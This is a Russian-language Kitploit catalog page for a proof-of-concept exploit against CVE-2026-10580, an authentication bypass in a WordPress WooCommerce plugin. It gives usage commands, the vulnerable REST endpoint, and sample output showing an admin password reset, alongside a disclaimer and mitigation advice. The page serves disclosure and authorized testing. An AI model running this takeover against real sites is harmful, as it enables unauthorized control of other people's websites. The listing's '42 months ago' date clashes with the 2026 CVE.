Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10580 — PoC-эксплойт для CVE-2026-10580 — обход аутентификации в Hippoo Mobile App for WooCommerce <= 1.9.4, приводящий к захвату учётной записи администратора | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
Аутентификация и авторизацияАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

PoC-эксплойт для CVE-2026-10580 — обход аутентификации в Hippoo Mobile App for WooCommerce <= 1.9.4, приводящий к захвату учётной записи администратора

Репозиторий
42 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WordPress

WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - Обход аутентификации для захвата учетной записи администратора

License: MIT

Обзор

Этот инструмент является доказательством концепции эксплойта для CVE-2026-10580, уязвимости обхода аутентификации, затрагивающей плагин WordPress Hippoo Mobile App for WooCommerce (версии <= 1.9.4). Уязвимость позволяет неаутентифицированным злоумышленникам сбрасывать пароль любого пользователя, включая администраторов, что приводит к полному захвату сайта.

⚠️ Важно: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, незаконно.

Возможности

  • Перечисляет всех пользователей WordPress через уязвимую конечную точку REST API
  • Сбрасывает пароль для указанного ID пользователя (по умолчанию: ID администратора 1)
  • Простой интерфейс командной строки с цветным выводом
  • Возможность отключения проверки SSL для тестовых сред

Использование

Предварительные требования

  • Python 3.6+
  • библиотека requests

Установите зависимости:

root@kitploit:~
pip install requests

Основная команда

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

Опции

Примеры

Эксплойт с ID администратора по умолчанию (1) и проверкой SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

Нацелиться на конкретный ID пользователя и отключить проверку SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

Запуск без баннера:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

Пример вывода

root@kitploit:~
[+] Found 3 user(s)
    - User ID: 1 | Username: admin | Role: administrator
    - User ID: 2 | Username: editor_user | Role: editor
    - User ID: 3 | Username: subscriber1 | Role: subscriber

╔══════════════════════════════════════════════════════════════╗
║             ADMIN TAKEOVER SUCCESSFUL                        ║
╚══════════════════════════════════════════════════════════════╝
    Target: https://example.com
    Login: https://example.com/wp-admin
    Username: admin
    Password: PwnedCVE2026!!

Меры по устранению

Если вы используете плагин Hippoo, немедленно обновите его до исправленной версии (>1.9.4). Дополнительно:

  • Регулярно проверяйте учетные записи пользователей на наличие несанкционированных изменений
  • Отслеживайте логи на предмет неожиданных API-запросов к /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • Рассмотрите возможность ограничения доступа к REST API WordPress, если в нем нет необходимости

Лицензия

Этот проект лицензирован под лицензией MIT. Подробности см. в файле LICENSE.

Автор

0xgh057r3c0n

Отказ от ответственности

Автор не несет ответственности за любое неправомерное использование этого инструмента. Используйте ответственно и только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.

Скачать инструмент
АргументОписание
-t, --targetURL целевого сайта WordPress (например, https://example.com)
-p, --passwordНовый пароль для учетной записи администратора
-i, --idID пользователя для захвата (по умолчанию: 1)
-k, --insecureПропустить проверку SSL-сертификата
--no-bannerСкрыть ASCII-баннер